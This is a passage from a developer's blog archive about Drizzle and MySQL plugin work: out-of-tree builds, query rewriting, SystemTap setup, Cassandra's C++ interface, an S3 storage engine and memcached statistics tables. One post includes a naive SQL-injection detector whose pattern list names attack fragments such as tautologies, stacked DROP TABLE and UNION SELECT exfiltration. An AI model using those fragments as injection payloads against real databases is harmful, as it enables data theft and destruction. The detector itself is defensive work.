process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__write__start")
process("/home/posulliv/repos/mysql/uc/sql/mysqld").mark("keycache__write__block")
$

You can see that there are probes in MySQL which would not make sense for Drizzle such as probes related to the query cache and keycache. In Drizzle, we are also starting to add probes around the optimizer but it is slow going. That's it for now. I'll probably write a brief post next week demonstrating using these probes in MySQL and Drizzle. I'll be covering more in my presentation at the MySQL user's conference in a few weeks.

Drizzle Accepted for GSoC 2010

2010-03-18T00:00:00-07:00

I just found out today that Drizzle was accepted as its own project for Google's Summer of Code this year. Our organization is listed here.
I'm acting as the program administrator for Drizzle this year with Eric Day and I'm really excited about it. Last year, I myself was a student in GSoC working on Drizzle and I feel like I got a lot out of that program so I really wanted to see Drizzle accepted as its own project this year. Hopefully, we can get lots of students working with us this year.
As someone who participated as a student and is now acting as a mentor, I can say that it is probably the best summer job any student could get. Basically, you get paid to work on an open-source project with awesome people and work from home. It can't really get much better if you ask me.
And any students interested in working on Drizzle should check out our ideas page on the wiki.

Out of Tree Plugins in Drizzle

2010-03-10T00:00:00-08:00

This week I've been working on porting the prototype MySQL storage engine developed at Akiban to Drizzle. While doing this, I discovered that in Drizzle, it is possible to build a plugin out of tree. When I say out of tree, I mean that I can develop a plugin for drizzle and build it without having a copy of the drizzle source code. This is amazingly awesome and is mostly due to the awesome build system that Monty has put together. This build system is called Pandora Build and if you are ever working on a project that needs to use autoconf-related tools, you should really check it out. It's friggin awesome. It lets you concentrate on development instead of having to spend a bunch of time trying to get a good build environment set up.
Anyway, here I am going to go through an example of how to build a drizzle plugin out of tree. The code is available at lp:~posulliv/drizzle/out-of-tree-example if anyone is interested in looking at it. I am going to take an existing plugin in the drizzle source tree I developed and show how to build it out of tree. The plugin I'm going to work with is the memcached_stats plugin.
Before starting, it's worth noting that Monty is working on creating a one-step tool for taking a plugin that is currently in drizzle's source tree (that is, in the plugin directory of a drizzle tree) and making it possible to build that plugin out of tree. His goal is that there need be no changes in content between a directory that's in the drizzle source tree and one that's outside the source tree.
For this post, we will assume that we are working in a directory named mc-stats-plugin. Before starting, this directory just contains source files. We will be adding all the build-related files that are needed to build it.
The first thing that is needed is a plugin.ini file for the plugin. For an out-of-tree plugin, a name and url are required. Thus, the plugin.ini file for this plugin will look like:

[plugin]
name=memcached_stats
title=Memcached Stats in DATA_DICTIONARY tables
description=Some DATA_DICTIONARY tables that provide Memcached stats
url=http://memcached.org/
version=0.1
disabled=yes
load_by_default=no
author=Padraig O Sullivan
license=PLUGIN_LICENSE_BSD
headers=stats_table.h analysis_table.h sysvar_holder.h
sources=memcached_stats.cc stats_table.cc analysis_table.cc
build_conditional="${ac_cv_libmemcached}" = "yes" -a "x${MEMCACHED_BINARY}" != "xno"
ldflags=${LTLIBMEMCACHED}

Once that's done, we need to create a config directory and copy a few files from drizzle's trunk:

$ mkdir config
$ cp $DRIZZLE_SRC_ROOT/config/config.rpath ./config/.
$ cp $DRIZZLE_SRC_ROOT/config/pandora-plugin ./config/.
$ cp -R $DRIZZLE_SRC_ROOT/m4 .

Like I said before, Monty is working on a tool that will automate the steps above. Now, we can proceed and start compiling our plugin:

$ ./config/pandora-plugin
$ autoreconf -i
libtoolize: putting auxiliary files in AC_CONFIG_AUX_DIR, `config'.
libtoolize: copying file `config/config.guess'
libtoolize: copying file `config/config.sub'
libtoolize: copying file `config/install-sh'
libtoolize: copying file `config/ltmain.sh'
libtoolize: putting macros in `m4'.
libtoolize: copying file `m4/libtool.m4'
libtoolize: copying file `m4/ltoptions.m4'
libtoolize: copying file `m4/ltsugar.m4'
libtoolize: copying file `m4/ltversion.m4'
libtoolize: copying file `m4/lt~obsolete.m4'
libtoolize: Remember to add `LT_INIT' to configure.ac.
libtoolize: Consider adding `AC_CONFIG_MACRO_DIR([m4])' to configure.ac and
libtoolize: rerunning libtoolize, to keep the correct libtool macros in-tree.
configure.ac:7: installing `config/compile'
configure.ac:7: installing `config/missing'
Makefile.am: installing `config/depcomp'
$ ./configure
...
$ make
make  all-am
make[1]: Entering directory `/home/posulliv/repos/drizzle/mc-stats-plugin'
  CXX    libmemcached_stats_plugin_la-memcached_stats.lo
  CXX    libmemcached_stats_plugin_la-stats_table.lo
  CXX    libmemcached_stats_plugin_la-analysis_table.lo
  CXXLD  libmemcached_stats_plugin.la
make[1]: Leaving directory `/home/posulliv/repos/drizzle/mc-stats-plugin'
$

Now, our plugin is built. To install it, we simply do a make install and give the --plugin_add=memcached_stats option to drizzled when we start the server.
I just think this process makes my life a whole lot easier and I wanted to bring some attention to how easy drizzle makes developing plugins.

Schema-Free Drizzle!

2010-03-02T00:00:00-08:00

I came across this post from Ilya Grigorik on Hacker News yesterday and I figured I just had to implement this in Drizzle now with the new query rewriting interface that I mentioned yesterday. The awesome thing about Drizzle is that I can try all these ideas out easily by just implementing a plugin.
Any SQL statements we want to use on our schema-free constructs, we have to prefix with the string 'nos'. With that said, here is a session demonstrating this query rewriting plugin:

Your Drizzle connection id is 2
Server version: 7 Source distribution (schema-less)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle> use test;
Database changed
drizzle> nos create table widgets;
Query OK, 0 rows affected (0.06 sec)

drizzle> nos insert into widgets (id,name) values ('a', 'apple');
Query OK, 1 row affected (0.19 sec)

drizzle> nos insert into widgets (id,name,type) values ('b', 'blackberry', 'phone');
Query OK, 1 row affected (0.21 sec)

drizzle> nos select * from widgets;
+------+------------+-------+
| id   | name       | type  |
+------+------------+-------+
| a    | apple      | NULL  | 
| b    | blackberry | phone | 
+------+------------+-------+
2 rows in set (0 sec)

drizzle> nos select * from widgets where id = 'a';
+------+-------+------+
| id   | name  | type |
+------+-------+------+
| a    | apple | NULL | 
+------+-------+------+
1 row in set (0 sec)

drizzle>

The code for this is available on Launchpad (lp:~posulliv/drizzle/schema-less). I threw this together in a few hours today for fun so it is what it is.
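To give a rough idea of the very first step a plugin like this has to take, here is a minimal sketch of recognizing the 'nos' prefix and stripping it off before doing anything else with the statement. This is not the code from the branch above: the function name stripNosPrefix is hypothetical, and I'm assuming the prefix is lowercase and must be followed by whitespace.

```cpp
#include <cctype>
#include <string>

// Hypothetical helper, not taken from the schema-less branch.
// If the statement starts with the keyword "nos" followed by whitespace,
// stores the remainder of the statement in 'rest' and returns true.
// Otherwise returns false and leaves 'rest' untouched.
bool stripNosPrefix(const std::string &query, std::string &rest)
{
  static const std::string prefix = "nos";
  std::string::size_type pos = 0;

  // Skip any leading whitespace.
  while (pos < query.size() &&
         std::isspace(static_cast<unsigned char>(query[pos])))
    ++pos;

  if (query.compare(pos, prefix.size(), prefix) != 0)
    return false;
  pos += prefix.size();

  // Require whitespace after the keyword so that a word such as
  // "nostalgia" is not mistaken for the prefix.
  if (pos >= query.size() ||
      !std::isspace(static_cast<unsigned char>(query[pos])))
    return false;

  // Skip the whitespace between the keyword and the real statement.
  while (pos < query.size() &&
         std::isspace(static_cast<unsigned char>(query[pos])))
    ++pos;

  rest = query.substr(pos);
  return true;
}
```

Statements without the prefix are left alone, so regular SQL would pass through such a plugin unchanged.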

Query Rewriting Plugin Point for Drizzle

2010-03-01T00:00:00-08:00

One of the first tasks in my new position at Akiban was to create a plugin point within Drizzle for query rewriting.
The first decision to make was where to insert a plugin point for a query rewriter. The parsed representation of a query would seem like a natural thing to pass to a query rewriter plugin since the plugin would not have to implement its own parser then. However, the parsed representation of a query in Drizzle is not the easiest in the world to deal with right now so passing this to a plugin would make developing a rewriting plugin quite difficult. Thus, I made the decision to create the plugin point before parsing occurs.
This means that if a plugin developer wants to do some complex rewriting, they may need to parse the query in their plugin. It may not be ideal but it does make the plugin API for query rewriting quite simple and opens up a lot of interesting opportunities.
Following the lead of other plugin interfaces such as the replication API developed by Jay, I wanted to keep it as simple and easy to understand as possible. With that in mind, here is the entire API for a query rewriting plugin:

Thus, all a plugin developer needs to do is implement the rewrite() function within their plugin. The query is passed by reference as a std::string so a plugin can do whatever it likes to this string and this string will then be passed to the parser in the Drizzle core kernel for parsing.
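To make the shape of such an interface concrete, here is a small sketch. It is not the actual header from the Drizzle tree: the class names QueryRewriter and TrimRewriter and the rewriteAll() helper are assumptions made up for this illustration. The only thing taken from the description above is that rewrite() receives the query as a std::string by reference and may change it before parsing.

```cpp
#include <string>
#include <vector>

// Hypothetical stand-in for a query rewriting plugin interface.
// The real Drizzle class may look different.
class QueryRewriter
{
public:
  virtual ~QueryRewriter() {}
  // Called before parsing; the plugin may modify the query in place.
  virtual void rewrite(std::string &query) = 0;
};

// Toy plugin: removes trailing whitespace and semicolons from the query.
class TrimRewriter : public QueryRewriter
{
public:
  void rewrite(std::string &query)
  {
    const std::string::size_type last = query.find_last_not_of(" \t\r\n;");
    if (last == std::string::npos)
      query.clear();          // nothing but whitespace and semicolons
    else
      query.erase(last + 1);  // drop everything after the last real character
  }
};

// Stand-in for what a server could do before handing the query to its
// parser: give every registered rewriter a chance to change the string.
void rewriteAll(const std::vector<QueryRewriter *> &plugins, std::string &query)
{
  for (std::vector<QueryRewriter *>::const_iterator it = plugins.begin();
       it != plugins.end(); ++it)
    (*it)->rewrite(query);
}
```

Because the plugin only ever sees a string, a rewriter in this style needs no knowledge of the parser's internal data structures, which is the trade-off described above.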
This interface opens up a lot of possibilities for interesting plugins. For example, one could develop a plugin to analyze a query for common SQL injection patterns or develop a plugin to rewrite a query based on a set of rules. I would be really interested in hearing other ideas people reading this have for plugins using this interface.
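As a taste of the SQL injection idea, here is a deliberately naive sketch of the kind of check a plugin could run on the raw query string. Everything in it is an assumption for illustration: the function names and the pattern list are made up, and simple substring matching like this will produce false positives and miss plenty of real attacks.

```cpp
#include <cctype>
#include <cstddef>
#include <string>

// Lower-cases the query and removes all whitespace so that the substring
// checks below are not defeated by spacing or letter case.
static std::string normalize(const std::string &query)
{
  std::string out;
  for (std::string::size_type i = 0; i < query.size(); ++i)
  {
    const unsigned char c = static_cast<unsigned char>(query[i]);
    if (!std::isspace(c))
      out.push_back(static_cast<char>(std::tolower(c)));
  }
  return out;
}

// Hypothetical check: returns true if the query contains one of a few
// well-known injection fragments. The list is illustrative only.
bool looksSuspicious(const std::string &query)
{
  static const char *const patterns[] = {
    "or'1'='1",    // classic tautology in a quoted comparison
    "or1=1",       // numeric tautology
    ";droptable",  // stacked destructive statement
    "unionselect"  // data exfiltration through UNION
  };
  const std::string flat = normalize(query);
  for (std::size_t i = 0; i < sizeof(patterns) / sizeof(patterns[0]); ++i)
  {
    if (flat.find(patterns[i]) != std::string::npos)
      return true;
  }
  return false;
}
```

A plugin built around a check like this could log the query or replace it with a harmless statement before it ever reaches the parser.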

Installing SystemTap on Ubuntu

2010-02-26T00:00:00-08:00

I'm presenting at the MySQL user's conference this year and one of my talks is on using SystemTap and DTrace with MySQL and Drizzle. I'm also doing a tutorial with Jay Pipes on developing replication plugins for Drizzle and that should be a lot of fun.
I wanted to write some posts before the conference that I can reference within my talk which detail how to install SystemTap and configure Drizzle and MySQL for use with SystemTap. Thus, this post is on how to install SystemTap on Ubuntu while my next post will go in to details about how to configure MySQL and Drizzle for use with SystemTap.
Before starting, it's worth noting that this post is specific to Ubuntu 9.10. The procedure to follow may be different on other versions so it's worth keeping that in mind. The first thing we do is install systemtap and some associated packages which will be needed by Drizzle and MySQL:

$ sudo apt-get install systemtap
$ sudo apt-get install systemtap-sdt-dev

Now, being used to Ubuntu, you would think you are good to go now. Unfortunately, attempting to run SystemTap will probably give you the following error:

$ stap -e 'probe kernel.function("sys_open") {log("hello world") exit()}'
semantic error: libdwfl failure (missing x86_64 kernel/module debuginfo under
'/lib/modules/2.6.31-19-generic/build'): No such file or directory while resolving probe point
kernel.function("sys_open")
semantic error: no probes found
Pass 2: analysis failed.  Try again with another '--vp 01' option.
$

The above error occurs because SystemTap needs to have a debug version of the kernel available. Unfortunately, installing the debug information for a kernel on Ubuntu is not a trivial operation. In fact, there is a bug on Launchpad about this issue. Thus, we will build a kernel debug package from source ourselves. This can be done as follows:

$ cd $HOME
$ sudo apt-get install dpkg-dev debhelper gawk
$ mkdir tmp
$ cd tmp
$ sudo apt-get build-dep --no-install-recommends linux-image-$(uname -r)
$ apt-get source linux-image-$(uname -r)
$ cd linux-2.6.31   # currently the kernel version of 9.10
$ fakeroot debian/rules clean
$ AUTOBUILD=1 fakeroot debian/rules binary-generic skipdbg=false
$ sudo dpkg -i ../linux-image-debug-2.6.31-19-generic_2.6.31-19.56_amd64.ddeb

This builds a debug image of the kernel and so will take quite a while. Once we have the above completed, we can try running our hello world example with SystemTap again. In order to get some output, you should open or create some file on the system in another terminal window. In this example, I backgrounded the stap process and created a file:

$ sudo stap -e 'probe kernel.function("sys_open") {log("hello world") exit()}' &
[1] 951
$ touch /tmp/padraig
$ hello world
$ [1]+ Done

Installing SystemTap on CentOS is significantly easier since it is primarily developed by Red Hat. A good article on how to install it on CentOS is available here.
In my next post on the topic, I'll explain how to configure MySQL and Drizzle for SystemTap and give some simple examples of using SystemTap with them.

Using the C++ Interface with Cassandra

2010-02-22T00:00:00-08:00

Before starting, Cassandra needs to be downloaded and installed. In a previous post, I went through the steps involved in setting up a Cassandra cluster so I'm not going to repeat that here. For this simple example though, I'll be using the following keyspace (which needs to be present in the storage-conf.xml file):

Once we have Cassandra installed and running, we next need to download thrift from its Apache homepage. I went with the latest stable release which at the time of writing is 0.2.0. Installation from the tarball is pretty straightforward but be sure to run ldconfig after installing thrift.
Once thrift is installed, we need to generate the C++ interface for Cassandra (this will be done as the cassandra user if following the setup in my previous post):

$ cd $CASSANDRA_HOME/interface
$ thrift --gen cpp cassandra.thrift
$ ls -ltr
total 44
drwxr-xr-x 3 cassandra cassandra  4096 2010-02-22 17:57 thrift
-rw-r--r-- 1 cassandra cassandra 21105 2010-02-22 17:57 cassandra.thrift
-rw-r--r-- 1 cassandra cassandra  3359 2010-02-22 17:57 cassandra.avpr
drwxr-xr-x 3 cassandra cassandra  4096 2010-02-22 18:01 avro
drwxr-xr-x 2 cassandra cassandra  4096 2010-02-22 21:41 gen-cpp
$ mkdir cpp-test

Within the cpp-test directory, I'm going to create a file named simple-test.cc which looks like:

To compile this, I used the following command line (assuming I am in the cpp-test directory):

$ g++ -o cpptest -Wall -g \
> -I../gen-cpp/. \
> -I/usr/local/include/thrift \
> -L/usr/local/lib -lstdc++ -lthrift \
> simple-test.cc \
> ../gen-cpp/cassandra_constants.cpp \
> ../gen-cpp/cassandra_types.cpp \
> ../gen-cpp/Cassandra.cpp
$

The above command will produce an executable named cpptest in the cpp-test directory. Assuming cassandra is started, we run the binary and should obtain output like so:

$ ./cpptest 
Column name retrieved is: second
Value in column retrieved is: this is data!!
$

That's a simple example of using the C++ interface to Cassandra. Hopefully, this will prove useful to someone but it took me longer than expected to get the above simple test working so I figured it was worth writing up the steps I went through.

New Job at Akiban

2010-02-06T00:00:00-08:00

I just finished my first week at my new position as a software engineer at Akiban Technologies in Boston.

I’m really excited about working here. Akiban is a small startup developing some really cool technology that I believe will get people talking about the relational model in a good way again. We are currently based in the South End of Boston. The building where we are located is pretty awesome and not at all what I pictured an office to be like. There is a resident artist in the building who hangs his paintings on the walls and they seem to move to different places at random times. It’s a strange feeling to walk in to work in the morning and smell fresh paint as I go to my desk. Definitely not something I expected!

But besides all that, one of the best things for me about working here is that I get paid to contribute to open source. I’ve been pretty involved with Drizzle for the last year while still a student and it was always something I really enjoyed which I never thought someone would pay me to work on. The community around the project is awesome and I was just happy to be involved with it. Now that I get paid to contribute, it’s nice to know that I can still be part of that community without having to worry about how I’m going to make a living. It’s weird to be paid for something that I would still be doing anyway without the pay! I’m not complaining though, it’s a nice change!

I’ll be presenting at the MySQL conference in April, lots of awesome work is happening in the Drizzle project and Akiban will be out of stealth mode by the conference so there are some exciting times ahead!

Moved to GitHub Pages

2010-01-28T00:00:00-08:00

I decided to move my blog to a new hosting provider - GitHub Pages. The blogging software used with GitHub is Jekyll.
I really like the fact that everything is done via a git repository. So far, I really like this setup.

S3 Storage Engine with Memcached in Drizzle

2009-11-09T00:00:00-08:00

Previously, I had ported Brian's memcached engine to Drizzle and recently, I've been doing some work with Amazon's S3 for school. Thus, I decided to have a look at Mark's S3 storage engine for MySQL. Over the last 2 days, I created a new version of the S3 storage engine for Drizzle with the option to use Memcached as a write-through cache for the S3 backend store. I see this work more as showing the cool things we can do in Drizzle and how quickly we can get prototypes up and running. I don't even know if this is a good idea or anything but it's cool to be able to store all data in S3.
First, let's see how to create a table with this engine. The one constraint on tables created with this engine is that they need to have a primary key specified on the table. Each table that is created in this engine is represented as a bucket in S3. So whenever you create a table with this engine, you create a bucket in S3. So let's try creating a table:

drizzle> create database demo;
Query OK, 1 row affected (0 sec)

drizzle> use demo;
Database changed
drizzle> create table padara (
    -> a int primary key,
    -> b varchar(255),
    -> c varchar(255)) engine=mcaws;
ERROR 1005 (HY000): Can't create table 'demo.padara' (errno: 1005)
drizzle>

Let's get some more information on why that table creation failed:

drizzle> show warnings;
+-------+------+-------------------------------------------------------------------------------------+
| Level | Code | Message                                                                             |
+-------+------+-------------------------------------------------------------------------------------+
| Error | 1005 | Amazon S3 Connection Pool has not been created (Did you specify your credentials?)  |
| Error | 1005 | Can't create table 'demo.padara' (errno: 1005)                                      |
+-------+------+-------------------------------------------------------------------------------------+
2 rows in set (0 sec)

drizzle>

As you can see, we need to specify our Amazon AWS access credentials before we can utilize this storage engine. For the moment, I have the following system variables associated with this plugin:

drizzle> show variables like '%AWS%';
+-----------------------+-------+
| Variable_name         | Value |
+-----------------------+-------+
| mcaws_accesskey       |       |
| mcaws_mcservers       |       |
| mcaws_secretaccesskey |       |
+-----------------------+-------+
3 rows in set (0 sec)

drizzle>

So I set the AWS access credentials by setting the appropriate system variables (this has to be done before tables can be created with this engine and in this order):

drizzle> set global mcaws_accesskey = 'YOUR_ACCESS_KEY';
Query OK, 0 rows affected (0 sec)

drizzle> set global mcaws_secretaccesskey = 'YOUR_SECRET_ACCESS_KEY';
Query OK, 0 rows affected (0 sec)

drizzle> show variables like '%AWS%';
+-----------------------+------------------------------------------+
| Variable_name         | Value                                    |
+-----------------------+------------------------------------------+
| mcaws_accesskey       | YOUR_ACCESS_KEY                          |
| mcaws_mcservers       |                                          |
| mcaws_secretaccesskey | YOUR_SECRET_ACCESS_KEY                   |
+-----------------------+------------------------------------------+
3 rows in set (0 sec)

drizzle>

Before creating the table, let's look at what buckets are associated with my S3 account. I'm going to use the S3Fox Firefox plugin for this (there are multiple other tools you could use). Here are the buckets in my S3 account right now:

I just have the one bucket for now. Now, I create a table using the S3 engine after specifying my AWS credentials:

drizzle> create table padara (
    -> a int primary key,
    -> b varchar(255),
    -> c varchar(255)) engine=mcaws;
Query OK, 0 rows affected (0.31 sec)

drizzle>

and when I look at my buckets in S3, I should see a new bucket representing the new table I created:

As can be seen, the bucket name is the database name concatenated with the table name - 'databasetable'. Next, let's insert some rows in the table and then see what objects are in the bucket:

drizzle> insert into padara
    -> values (1, 'padraig', 'sullivan');
Query OK, 1 row affected (0.07 sec)

drizzle> insert into padara
    -> values (2, 'domhnall', 'sullivan');
Query OK, 1 row affected (0.08 sec)

drizzle> insert into padara
    -> values (3, 'tomas', 'sullivan');
Query OK, 1 row affected (0.14 sec)

drizzle>

Now we can query the table. Queries on the table need to specify a primary key value in the WHERE clause for now so we will just be returning one row (I'll be looking into range queries pretty soon):

drizzle> select *
    -> from padara
    -> where a = 2;
+---+----------+----------+
| a | b        | c        |
+---+----------+----------+
| 2 | domhnall | sullivan |
+---+----------+----------+
1 row in set (5 sec)

drizzle>

That's basically the simple S3 engine. It works just like a regular storage engine except the data is stored on S3. Of course, the latency involved in interacting with S3 for every request can be quite limiting. For example, the simple query above took 5 seconds to retrieve the data. Thus, I added support for using memcached as a write-through cache for this engine. All we need to do is specify the memcached servers to use in the appropriate system variable:

drizzle> set global mcaws_mcservers = 'localhost:19191';
Query OK, 0 rows affected (0 sec)

drizzle>

Now, whenever we query a table created in this engine, we will check for the data in memcached first and if we miss in the cache, only then do we go to S3 for the data. When inserting new data, we insert it in both memcached and S3. Using memcached for this engine is totally optional. It can simply be used as a way to store data in S3 through the engine interface but I thought it might prove to be a useful option for an engine like this.
I wanted to show how clean the plugin code that implements this functionality is. This goes to show the benefit of the great build system Monty Taylor has put a lot of work into in Drizzle. I can easily utilize external libraries in my plugin - in this case libmemcached and libaws. The code below first checks for data in memcached and if it is not present there, retrieves the data from S3 and updates memcached before returning to the engine.
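For readers who just want the idea, here is a minimal sketch of that read path together with the write-through insert. It is not the plugin's code: std::map stands in for both memcached and S3, and the class name WriteThroughStore, its methods and the key format used in the usage note are all assumptions made for this illustration.

```cpp
#include <map>
#include <string>

// In-memory stand-ins; the real engine talks to memcached and S3.
typedef std::map<std::string, std::string> KeyValueStore;

class WriteThroughStore
{
public:
  WriteThroughStore() : backend_reads_(0) {}

  // Insert: write the row to both the backing store and the cache.
  void put(const std::string &key, const std::string &value)
  {
    backend_[key] = value;
    cache_[key] = value;
  }

  // Read: try the cache first. On a miss, fetch from the backing store
  // and populate the cache before returning.
  bool get(const std::string &key, std::string &value)
  {
    KeyValueStore::const_iterator hit = cache_.find(key);
    if (hit != cache_.end())
    {
      value = hit->second;
      return true;
    }
    ++backend_reads_;  // this is the slow, S3-like path
    KeyValueStore::const_iterator row = backend_.find(key);
    if (row == backend_.end())
      return false;
    cache_[key] = row->second;
    value = row->second;
    return true;
  }

  // Simulates an eviction or a restart of the cache.
  void dropFromCache(const std::string &key) { cache_.erase(key); }

  // Number of reads that had to go to the backing store.
  unsigned int backendReads() const { return backend_reads_; }

private:
  KeyValueStore cache_;
  KeyValueStore backend_;
  unsigned int backend_reads_;
};
```

With a store like this, calling put("demopadara/2", "domhnall,sullivan") followed by get("demopadara/2", value) never touches the backing store, and only a get() after dropFromCache() pays the slow round trip once.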

So that's about it for now. In the future, there are a few things I plan on working on for this engine:

removing the need to have a table represented as a bucket in S3 (this design makes the code much simpler for now)

increasing the size of the objects transferred from/to S3 - make the unit of transfer between the engine a page instead of a row as it is now

create I_S tables for monitoring S3 usage

add support for range queries

remove the need for a table to have a primary key

If you are interested in downloading the branch and playing with it, you can get it and build it by:

$ bzr branch lp:~posulliv/drizzle/aws-mc-engine
$ cd aws-mc-engine
$ ./config/autorun.sh && ./configure && make

libmemcached and libaws are prerequisites that you will need installed before compiling this plugin. If anyone has any feedback or suggestions on what to do with this, that would be awesome. I really have no idea what to do with it!

Viewing Memcached Statistics from Drizzle

2009-09-29T00:00:00-07:00

While working on a few memcached-related plugins for Drizzle, I noticed that it would be nice to have the ability to query memcached statistics from an INFORMATION_SCHEMA table. Today I put together a plugin that adds 2 memcached-related I_S tables to drizzle. First, let's see the tables the plugin adds to drizzle along with the columns in each table:

drizzle> select table_name
    -> from information_schema.tables
    -> where table_name like '%MEMCACHED%';
+--------------------+
| table_name         |
+--------------------+
| MEMCACHED_STATS    | 
| MEMCACHED_ANALYSIS | 
+--------------------+
2 rows in set (0 sec)

drizzle> desc information_schema.memcached_stats;
+-----------------------+-------------+------+-----+---------+-------+
| Field                 | Type        | Null | Key | Default | Extra |
+-----------------------+-------------+------+-----+---------+-------+
| NAME                  | varchar(32) | NO   |     |         |       | 
| PORT_NUMBER           | bigint      | NO   |     | 0       |       | 
| PROCESS_ID            | bigint      | NO   |     | 0       |       | 
| UPTIME                | bigint      | NO   |     | 0       |       | 
| TIME                  | bigint      | NO   |     | 0       |       | 
| VERSION               | varchar(8)  | NO   |     |         |       | 
| POINTER_SIZE          | bigint      | NO   |     | 0       |       | 
| RUSAGE_USER           | bigint      | NO   |     | 0       |       | 
| RUSAGE_SYSTEM         | bigint      | NO   |     | 0       |       | 
| CURRENT_ITEMS         | bigint      | NO   |     | 0       |       | 
| TOTAL_ITEMS           | bigint      | NO   |     | 0       |       | 
| BYTES                 | bigint      | NO   |     | 0       |       | 
| CURRENT_CONNECTIONS   | bigint      | NO   |     | 0       |       | 
| TOTAL_CONNECTIONS     | bigint      | NO   |     | 0       |       | 
| CONNECTION_STRUCTURES | bigint      | NO   |     | 0       |       | 
| GETS                  | bigint      | NO   |     | 0       |       | 
| SETS                  | bigint      | NO   |     | 0       |       | 
| HITS                  | bigint      | NO   |     | 0       |       | 
| MISSES                | bigint      | NO   |     | 0       |       | 
| EVICTIONS             | bigint      | NO   |     | 0       |       | 
| BYTES_READ            | bigint      | NO   |     | 0       |       | 
| BYTES_WRITTEN         | bigint      | NO   |     | 0       |       | 
| LIMIT_MAXBYTES        | bigint      | NO   |     | 0       |       | 
| THREADS               | bigint      | NO   |     | 0       |       | 
+-----------------------+-------------+------+-----+---------+-------+
24 rows in set (0 sec)

drizzle> desc information_schema.memcached_analysis;
+--------------------------------+-------------+------+-----+---------+-------+
| Field                          | Type        | Null | Key | Default | Extra |
+--------------------------------+-------------+------+-----+---------+-------+
| SERVERS_ANALYZED               | bigint      | NO   |     | 0       |       | 
| AVERAGE_ITEM_SIZE              | bigint      | NO   |     | 0       |       | 
| NODE_WITH_MOST_MEM_CONSUMPTION | varchar(32) | NO   |     |         |       | 
| USED_BYTES                     | bigint      | NO   |     | 0       |       | 
| NODE_WITH_LEAST_FREE_SPACE     | varchar(32) | NO   |     |         |       | 
| FREE_BYTES                     | bigint      | NO   |     | 0       |       | 
| NODE_WITH_LONGEST_UPTIME       | varchar(32) | NO   |     |         |       | 
| LONGEST_UPTIME                 | bigint      | NO   |     | 0       |       | 
| POOL_WIDE_HIT_RATIO            | bigint      | NO   |     | 0       |       | 
+--------------------------------+-------------+------+-----+---------+-------+
9 rows in set (0.01 sec)

drizzle>

You might wonder how you specify the memcached servers to obtain statistics on. Well, I created a system variable for that purpose:

drizzle> show variables like '%memcached%';
+-------------------------+-------+
| Variable_name           | Value |
+-------------------------+-------+
| memcached_stats_servers |       | 
+-------------------------+-------+
1 row in set (0 sec)

drizzle>

Now, let's set the system variable to a small memcached instance I have running on my laptop:

drizzle> set global memcached_stats_servers = 'localhost:11211';
Query OK, 0 rows affected (0 sec)

drizzle> show variables like '%memcached%';
+-------------------------+-----------------+
| Variable_name           | Value           |
+-------------------------+-----------------+
| memcached_stats_servers | localhost:11211 | 
+-------------------------+-----------------+
1 row in set (0 sec)

drizzle>

And let's do a simple query on the MEMCACHED_STATS table:

drizzle> select name, port_number, version, gets, sets, hits, misses
    -> from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
+----------------------------------+-------------+----------+------+------+------+--------+
1 row in set (0 sec)

drizzle>

The MEMCACHED_ANALYSIS table is not interesting unless there is more than 1 memcached server specified in the system variable. Thus, we need to update that system variable first:

drizzle> set global memcached_stats_servers = 'localhost:11211, localhost:11212';
Query OK, 0 rows affected (0 sec)

drizzle>
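A value like the one above has to be split into individual host and port pairs before any server can be contacted. Here is a rough sketch of that step. It is not the plugin's code: the Server typedef and the parseServers() and trim() names are hypothetical, and falling back to port 11211 (memcached's default) when no port is given is my assumption.

```cpp
#include <cstdlib>
#include <string>
#include <utility>
#include <vector>

typedef std::pair<std::string, unsigned int> Server;  // host, port

// Removes leading and trailing spaces and tabs.
static std::string trim(const std::string &s)
{
  const std::string::size_type first = s.find_first_not_of(" \t");
  if (first == std::string::npos)
    return std::string();
  const std::string::size_type last = s.find_last_not_of(" \t");
  return s.substr(first, last - first + 1);
}

// Splits a comma-separated "host:port" list into (host, port) pairs.
// Empty entries are skipped.
std::vector<Server> parseServers(const std::string &list)
{
  std::vector<Server> servers;
  std::string::size_type start = 0;
  while (start <= list.size())
  {
    std::string::size_type comma = list.find(',', start);
    if (comma == std::string::npos)
      comma = list.size();
    const std::string entry = trim(list.substr(start, comma - start));
    if (!entry.empty())
    {
      std::string host = entry;
      unsigned int port = 11211;  // assumed default when no port is given
      const std::string::size_type colon = entry.find(':');
      if (colon != std::string::npos)
      {
        host = entry.substr(0, colon);
        port = static_cast<unsigned int>(
            std::strtoul(entry.c_str() + colon + 1, NULL, 10));
      }
      servers.push_back(Server(host, port));
    }
    start = comma + 1;
  }
  return servers;
}
```

Note that the space after the comma in the value set above is tolerated because each entry is trimmed before it is split on the colon.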

Now, let's do the same query on MEMCACHED_STATS again:

drizzle> select name, port_number, version, gets, sets, hits, misses from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
+----------------------------------+-------------+----------+------+------+------+--------+
| localhost                        |       11211 | 1.2.6    |  975 |  407 |  950 |     25 | 
| localhost                        |       11212 | 1.2.6    |    0 |    0 |    0 |      0 | 
+----------------------------------+-------------+----------+------+------+------+--------+
2 rows in set (0 sec)

drizzle>

So you can see that for each server you specify in the system variable, a row will be output in the table. I'm going to make some activity happen in the second memcached instance I just started on my machine. Another branch I created over the last few days is a port of Brian's memcached engine to drizzle. So I'm going to create a table using the memcached engine and then insert some data into that table:

drizzle> create table test_data (
    -> a int primary key,
    -> b int,
    -> c varchar(64))
    -> engine=memcached;
Query OK, 0 rows affected (0.01 sec)

drizzle> insert into test_data
    -> values (1, 2, "this will be stored in memcached");
Query OK, 1 row affected (0.01 sec)

drizzle> select b, c 
    -> from test_data
    -> where a = 1;
+------+----------------------------------+
| b    | c                                |
+------+----------------------------------+
|    2 | this will be stored in memcached | 
+------+----------------------------------+
1 row in set (0 sec)

drizzle> select b, c  from test_data where a = 2;
Empty set (0 sec)

drizzle>

Now, let's query the statistics again:

drizzle> select name, port_number, version, gets, sets, hits, misses from information_schema.memcached_stats;
+----------------------------------+-------------+----------+------+------+------+--------+
| name                             | port_number | version  | gets | sets | hits | misses |
